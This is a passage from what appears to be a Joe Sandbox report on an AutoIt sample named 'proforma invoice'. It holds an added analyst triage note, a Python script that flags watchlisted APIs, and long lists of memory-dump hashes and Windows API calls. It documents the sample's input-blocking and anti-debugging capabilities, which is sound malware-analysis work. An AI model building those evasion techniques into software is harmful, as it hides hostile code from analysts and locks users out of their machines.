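                  Triage note and added example (not part of the Joe Sandbox report and not code from the sample): the two functions listed just above are the call sites behind the report's "block mouse and keyboard input" and exception-filter signatures, BlockInput.USER32(00000001) at 00B1EABD (argument 00000001 is fBlockIt = TRUE) and SetUnhandledExceptionFilter.KERNEL32 at 00AC09DA. Both references lie in the 00AA0000 image that also carries the "AutoIt v3" window-class strings shown further down, so on their own they document what the AutoIt runtime is able to do rather than proven use by the embedded script; the practical check is to pull every such reference out of the listing, keep the ones on a watchlist, and confirm the call-site address really falls inside the dumped image. The Python below does that over the report's own "APIs" line format. The watchlist is an analyst-chosen assumption (not a Joe Sandbox list), the image range 0x00AA0000-0x00B80000 is an assumption derived from the dump offsets listed above, and the sample lines are constructed from entries on this page.

```python
import re
from collections import Counter

# One Joe Sandbox "APIs" entry as it appears in the disassembly listing, e.g.
#   • BlockInput.USER32(00000001), ref: 00B1EABD
#   • DestroyWindow.USER32 ref: 00B22B52                       (no argument list)
#   • Part of subcall function 00B373E8: GetSysColor.USER32(00000012), ref: 00B37421
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Analyst-chosen watchlist (assumption: this is not a Joe Sandbox list).
# Keys are API names exactly as they appear before the module suffix.
WATCHLIST = {
    "BlockInput": "blocks keyboard and mouse input; arg 00000001 is fBlockIt=TRUE",
    "SetUnhandledExceptionFilter": "replaces the top-level exception filter (anti-debug primitive)",
    "IsDebuggerPresent": "direct debugger check",
}

# Image range assumption: taken from the dump offsets in this report
# (Source File at 00AA0000, last associated dump at 00B74000); the end is rounded up.
IMAGE_RANGE = (0x00AA0000, 0x00B80000)


def parse_api_lines(text):
    """Return one dict per API entry found in the report text; other lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        entries.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),   # call-site address
            "subcall": m.group("callee"),     # set when the call sits inside a callee
        })
    return entries


def triage(text, image_range=IMAGE_RANGE):
    """Flag watchlisted APIs and count references per module.

    Each hit records whether its call site lies inside the analysed image, so a
    reference pointing outside the dumped range shows up as a parsing or
    relocation problem instead of being silently trusted.
    """
    lo, hi = image_range
    hits, per_module = [], Counter()
    for e in parse_api_lines(text):
        per_module[e["module"]] += 1
        if e["api"] in WATCHLIST:
            hits.append({**e, "why": WATCHLIST[e["api"]], "in_image": lo <= e["ref"] < hi})
    return hits, per_module


# Constructed sample: five API lines copied from this listing plus one non-API line.
SAMPLE = """\
• BlockInput.USER32(00000001), ref: 00B1EABD
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00AC03EE), ref: 00AC09DA
• DestroyWindow.USER32 ref: 00B22B52
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22CF8
  • Part of subcall function 00B373E8: GetSysColor.USER32(00000012), ref: 00B37421
Memory Dump Source
"""

if __name__ == "__main__":
    found, modules = triage(SAMPLE)
    for h in found:
        where = "in image" if h["in_image"] else "OUTSIDE image"
        print(f"{h['api']}.{h['module']}({','.join(h['args'])}) @ {h['ref']:08X} [{where}]: {h['why']}")
    print(dict(modules))
```

                  Run it over the full exported report text instead of SAMPLE to get every watchlisted call site with its module tally; a hit reported as OUTSIDE image means the ref address does not belong to the dump the listing claims, and should be resolved before it is cited as evidence.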
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                  • Instruction ID: 8972f152be45c61aa52b66aec86a96c8f5cc4be620c2144e38b20412ab91f621
                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                  • Instruction Fuzzy Hash: 4851AD7160C7059BDF788778895DFBE27E99B12340F1B050DEA82DB282CA25DE81DF52
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 42233e93606714ed3d318d226849d52b8a472c666fec1bfa63c9b8c13a8a5917
                  • Instruction ID: 33803a092f87fb275f982d9b2c6be3054c9d6cc0bc272f0dde0b179dc00133d3
                  • Opcode Fuzzy Hash: 42233e93606714ed3d318d226849d52b8a472c666fec1bfa63c9b8c13a8a5917
                  • Instruction Fuzzy Hash: EA324326D69F014DD7279634DC22339A249AFB73C5F15C737F81AB6AA6EF28C5835100
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2754ffaa6b69e99852e27258e570bdd1e47c43b67c5df65915052cec8014b42c
                  • Instruction ID: a075e16cd9c5d5f8c0887f96197236b13674c342f6063d979a9a0ac2312e6767
                  • Opcode Fuzzy Hash: 2754ffaa6b69e99852e27258e570bdd1e47c43b67c5df65915052cec8014b42c
                  • Instruction Fuzzy Hash: E4323C31A0411D8BDF28CFAAC690ABD7BB1EB45370F288566F649CB292D734DD81DB40
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 38fe36512b86e4ae9a1eb6e28bbc57e3251360d23252b98774c88706e3910dd1
                  • Instruction ID: f71003375893c1b7caee409d654076982377c69079cfbdaad3b4f76a588edea6
                  • Opcode Fuzzy Hash: 38fe36512b86e4ae9a1eb6e28bbc57e3251360d23252b98774c88706e3910dd1
                  • Instruction Fuzzy Hash: E022A0B0E0060ADFDF14CF65D981AAEB3F6FF45304F244529E816AB291EB369D11CB60
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc0eadceb6bbf8cd1b629358cdbc38e471137db5d57a33e51a670557019e4216
                  • Instruction ID: a4e40991ca22b1698ba36d7b5840ccd8dbbce601f56755db6cbe037bebaa7c66
                  • Opcode Fuzzy Hash: cc0eadceb6bbf8cd1b629358cdbc38e471137db5d57a33e51a670557019e4216
                  • Instruction Fuzzy Hash: BD02C5B0A00205EFDF04DF65D981AAEB7B5FF44340F218169E8169B2D1EB35EE24CB95
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0703f7edccd66ef27660bf18758ecccb2c4f1ee11f48f5454137905d50242876
                  • Instruction ID: 51015c9e65fa8cb4831623499bf3c6fe56a0ea2614b809b53c1a3dd79511d15b
                  • Opcode Fuzzy Hash: 0703f7edccd66ef27660bf18758ecccb2c4f1ee11f48f5454137905d50242876
                  • Instruction Fuzzy Hash: 2DB1F124D2AF404DC2239A398831336B69CBFBB6D5F95D71BFC1675E22EF2286834140
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                  • Instruction ID: a6ee8a578cef33e0e171f062d61b2d360b6259f9153023e57764519a2527bd21
                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                  • Instruction Fuzzy Hash: AE9156723080A349DB2A473E8574A7DFFE15A533A131B079DE4F3CA1C6FE248965D620
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                  • Instruction ID: acc6abfc207bba404495ad88bd05dbcc101a928b0300994719212c7bb04a61d9
                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                  • Instruction Fuzzy Hash: 4D9123723090A34ADB2D477A8574A3DFFF15A933A131B079DD4F2CA1C2FE24C9659A20
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e2c76b0c41f9858548ff1379a24deb75b9e541dd062f70bac1e49622876fcd3e
                  • Instruction ID: 38fd5fdfc0727e576347a373eb51c71f935bb2b9e7c85250f440d9e2b2a1b24f
                  • Opcode Fuzzy Hash: e2c76b0c41f9858548ff1379a24deb75b9e541dd062f70bac1e49622876fcd3e
                  • Instruction Fuzzy Hash: 6061487160C709A7DB349B288E95FBE23A4EF41750F17091EE843DF281DA159E42CF55
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 412da774ac2da30e1e18f56cd13e2eac06d4f4277e315c30b244d648a58f8744
                  • Instruction ID: 326aee709f6f0a7f1dfd990c7bc05ca912b552c4d91c0266b77f34a212d8cd88
                  • Opcode Fuzzy Hash: 412da774ac2da30e1e18f56cd13e2eac06d4f4277e315c30b244d648a58f8744
                  • Instruction Fuzzy Hash: 71617A72608709A7DE3A9B284952FBF23A4EF42744F12095EF843DF281DA16AD42CE55
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                  • Instruction ID: 2aea3f8aaddc38ab449ebd68789bac682f960b4ed6272318b38b3f98604d19bf
                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                  • Instruction Fuzzy Hash: 7E81417270D0A349EB69473A8574A3EFFE15A933A131B079DD4F2CA1C2EE24D554E620
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b30bb6936f383ce47abf5590e222f28cf6cf1f94798d2492385fc48ee83b62b3
                  • Instruction ID: 58dda31bb26b502c68ece42344c185203fe9ac2880312ee1c2ab50902b7521c4
                  • Opcode Fuzzy Hash: b30bb6936f383ce47abf5590e222f28cf6cf1f94798d2492385fc48ee83b62b3
                  • Instruction Fuzzy Hash: 4A51289194FBD69FE7039774887A188FF30EC5B51436886CFC8805A88BD791502ADB9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 766161dc7ba3aa9d6a16737f125325f29b0774b06bd3213b3f953fee747d769b
                  • Instruction ID: 5eecfad6af02ad2e64e8458c01559a4f10156034847f619558fa206cf40d75e1
                  • Opcode Fuzzy Hash: 766161dc7ba3aa9d6a16737f125325f29b0774b06bd3213b3f953fee747d769b
                  • Instruction Fuzzy Hash: D321D5326206118BD728CF79C8226BA73E5E754310F15866EE4A7C73D1DE39A944CB80
                  APIs
                  • DeleteObject.GDI32(00000000), ref: 00B22B30
                  • DeleteObject.GDI32(00000000), ref: 00B22B43
                  • DestroyWindow.USER32 ref: 00B22B52
                  • GetDesktopWindow.USER32 ref: 00B22B6D
                  • GetWindowRect.USER32(00000000), ref: 00B22B74
                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B22CA3
                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B22CB1
                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22CF8
                  • GetClientRect.USER32(00000000,?), ref: 00B22D04
                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B22D40
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D62
                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D75
                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D80
                  • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D89
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D98
                  • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DA1
                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DA8
                  • GlobalFree.KERNEL32(00000000), ref: 00B22DB3
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DC5
                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B3FC38,00000000), ref: 00B22DDB
                  • GlobalFree.KERNEL32(00000000), ref: 00B22DEB
                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B22E11
                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B22E30
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22E52
                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B2303F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                  • String ID: $AutoIt v3$DISPLAY$static
                  • API String ID: 2211948467-2373415609
                  • Opcode ID: 7d9d11aa1b4b6dac6341fa3162d52ce41b77b4e758b53b31924574a6d04eb653
                  • Instruction ID: 0ae80172484f0ad3ed209ef34e0fb624a59c13c2f068804a543efac464793644
                  • Opcode Fuzzy Hash: 7d9d11aa1b4b6dac6341fa3162d52ce41b77b4e758b53b31924574a6d04eb653
                  • Instruction Fuzzy Hash: 9D028B71900215EFDB14DFA8DD89EAE7BB9EF49310F148558F919AB2A1CB34ED00CB60
                  APIs
                  • SetTextColor.GDI32(?,00000000), ref: 00B3712F
                  • GetSysColorBrush.USER32(0000000F), ref: 00B37160
                  • GetSysColor.USER32(0000000F), ref: 00B3716C
                  • SetBkColor.GDI32(?,000000FF), ref: 00B37186
                  • SelectObject.GDI32(?,?), ref: 00B37195
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B371C0
                  • GetSysColor.USER32(00000010), ref: 00B371C8
                  • CreateSolidBrush.GDI32(00000000), ref: 00B371CF
                  • FrameRect.USER32(?,?,00000000), ref: 00B371DE
                  • DeleteObject.GDI32(00000000), ref: 00B371E5
                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00B37230
                  • FillRect.USER32(?,?,?), ref: 00B37262
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B37284
                    • Part of subcall function 00B373E8: GetSysColor.USER32(00000012), ref: 00B37421
                    • Part of subcall function 00B373E8: SetTextColor.GDI32(?,?), ref: 00B37425
                    • Part of subcall function 00B373E8: GetSysColorBrush.USER32(0000000F), ref: 00B3743B
                    • Part of subcall function 00B373E8: GetSysColor.USER32(0000000F), ref: 00B37446
                    • Part of subcall function 00B373E8: GetSysColor.USER32(00000011), ref: 00B37463
                    • Part of subcall function 00B373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B37471
                    • Part of subcall function 00B373E8: SelectObject.GDI32(?,00000000), ref: 00B37482
                    • Part of subcall function 00B373E8: SetBkColor.GDI32(?,00000000), ref: 00B3748B
                    • Part of subcall function 00B373E8: SelectObject.GDI32(?,?), ref: 00B37498
                    • Part of subcall function 00B373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00B374B7
                    • Part of subcall function 00B373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B374CE
                    • Part of subcall function 00B373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00B374DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                  • String ID:
                  • API String ID: 4124339563-0
                  • Opcode ID: 44a4dd4c0680b649d602e26056f58b315c98643a5a7147fd6f5b5b99dc75f5e7
                  • Instruction ID: 923482a1147b561f03bb75052d2fc595c9dcf2202cdb4f22c2aecb084f486acc
                  • Opcode Fuzzy Hash: 44a4dd4c0680b649d602e26056f58b315c98643a5a7147fd6f5b5b99dc75f5e7
                  • Instruction Fuzzy Hash: F1A19F72008701AFDB109FA4DC49E6FBBE9FB49321F200A19F962A71E1DB71E944DB51
                  APIs
                  • DestroyWindow.USER32(?,?), ref: 00AB8E14
                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00AF6AC5
                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AF6AFE
                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AF6F43
                    • Part of subcall function 00AB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB8BE8,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8FC5
                  • SendMessageW.USER32(?,00001053), ref: 00AF6F7F
                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AF6F96
                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00AF6FAC
                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00AF6FB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                  • String ID: 0
                  • API String ID: 2760611726-4108050209
                  • Opcode ID: e7a4176402a4094714cf3aa47c97cdd910ced729ca2fc6d6805b40b92182b678
